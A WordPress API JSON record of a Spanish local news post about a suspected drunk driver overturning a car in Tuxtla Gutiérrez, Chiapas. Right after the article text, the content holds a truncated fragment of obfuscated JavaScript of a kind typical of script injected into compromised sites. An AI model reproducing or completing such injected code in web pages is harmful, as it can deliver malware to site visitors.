{"id":9022,"date":"2023-03-13T03:00:31","date_gmt":"2023-03-13T03:00:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9022"},"modified":"2023-03-13T03:00:32","modified_gmt":"2023-03-13T03:00:32","slug":"conductor-termina-volcando-en-la-potrero-mirador","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9022","title":{"rendered":"Conductor termina volcando en la Potrero Mirador"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678676294226.jpg\" alt=\"\" class=\"wp-image-9023\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678676294226.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678676294226-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 12 de Marzo del 2023. Tuxtla Guti\u00e9rrez.- Este s\u00e1bado por la noche, se registr\u00f3 una fuerte Volcadura en la zona Sur de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que todo ocurri\u00f3 cuando el conductor de un Chevrolet Aveo de color gris corr\u00eda en a la altura del parque de la colonia Potrero Mirador cuando perdi\u00f3 el control, por ser una pendiente.En el lugar testigos relataron que el conductor circulaba en estado de ebriedad, una llanta choc\u00f3 contra la guarnici\u00f3n, choc\u00f3 contra un VW sedan y termin\u00f3 volcado a la altura de la Calle Distrito Federal y Monterrey.El sujeto termin\u00f3 con lesiones leves y no fue trasladado a un nosocomio.Los elementos de tr\u00e1nsito tomaron datos de lo sucedido y una gr\u00faa remolc\u00f3 la unidad al corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 12 de Marzo del 2023. Tuxtla Guti\u00e9rrez.- Este s\u00e1bado por la noche, se registr\u00f3 una fuerte Volcadura en la zona Sur de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que todo ocurri\u00f3 cuando el conductor de un Chevrolet Aveo de color gris corr\u00eda en a la altura del parque de la colonia Potrero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9023,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9022","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9022"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9022\/revisions"}],"predecessor-version":[{"id":9024,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9022\/revisions\/9024"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9023"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9022"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}